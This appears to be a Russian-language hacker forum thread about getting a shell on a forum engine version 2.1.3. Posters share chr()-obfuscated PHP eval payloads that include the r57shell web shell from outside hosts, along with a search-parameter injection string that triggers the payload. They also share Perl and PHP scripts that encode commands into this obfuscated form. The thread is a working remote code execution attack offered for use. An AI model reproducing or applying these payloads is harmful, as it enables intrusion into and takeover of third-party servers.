дело вообщем татакое: нашол форум 2.1.3 , создал топик с таким содержимым eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); // после чего через поиск нашол свои топ и добавил &lastdate=z|eval.*?%20//)%23e%00 но странно не получил долгожданный шелл , а почемуто подгрузилась страница производителя , как будто шелла у них нет на сервере. Помогите в чем может быть дело.
Хы ты че тока узнал? воид закрылся, все файлы тоже закрыты нада расшифровать код этот и вставить свой шел в .тхт формате и потом будет работать се Вот тебе код чеб зашифровать PHP: #!usr/bin/perl while () { print "\r\nCommand for encode or 'exit' for exit "; while(<STDIN>) { $cmd=$_; chomp($cmd); exit() if ($cmd eq 'exit'); last; } $len = length($cmd); for ($i=0; $i<$len; $i++) { $s = substr($cmd,$i,1); $out.="chr(".ord($s).")"; if($i != $len-1) { $out.="."; } } print "eval(system(".$out.").chr(59).exit()); //"; $out = ""; } а зашифрованно там это: PHP: eval("include \"http://rst.void.ru/download/r57shell.txt\";/*");
Спрашивается, зачем усложнять себе жизнь? Вот код на ПХП, куда вставлять адрес - думаю видно... PHP: <?php $str="include \"http://rst.void.ru/download/r57shell.txt.gz\";/*";// */ echo "eval( "; for($i=0;$i<strlen($str);$i++) { echo "chr(".ord($str[$i])."). "; } echo "chr(".ord(" ").") ); //"; ? Кстать, файлы на рст не закрыты, а просто у некоторых изменились имена и случилось это еще до закрытия проекта... rst.void.ru/download/r57shell.txt.gz хоть и gz - канает без проблем...
Вот пользуйся этим : PHP: eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(104). chr(105). chr(109). chr(97). chr(115). chr(50). chr(48). chr(48). chr(53). chr(46). chr(110). chr(97). chr(114). chr(111). chr(100). chr(46). chr(114). chr(117). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(112). chr(104). chr(112). chr(34). chr(59). chr(47). chr(42). chr(32) ); //
